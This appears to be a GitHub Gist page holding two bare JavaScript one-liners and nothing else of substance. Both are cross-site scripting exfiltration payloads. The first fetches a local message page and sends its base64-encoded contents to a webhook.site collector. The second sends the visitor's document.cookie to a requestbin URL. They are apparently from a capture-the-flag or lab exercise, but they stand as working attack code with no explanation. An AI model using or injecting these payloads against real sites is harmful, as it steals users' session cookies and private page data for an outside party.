Skip to content

Instantly share code, notes, and snippets.

View isgandarisgandarov's full-sized avatar

Isgandar Isgandarov isgandarisgandarov

  • Baku Higher Oil School
View GitHub Profile
fetch("http://127.0.0.1/message/3").then(res => {return res.text();}).then(res =>fetch("http://webhook.site/12a151e7-714a-4e54-bc8c-136f4874fc34?log="+btoa(res)));
fetch('http://requestbin.whapi.cloud/10439xo1?cookie=' + encodeURIComponent(document.cookie));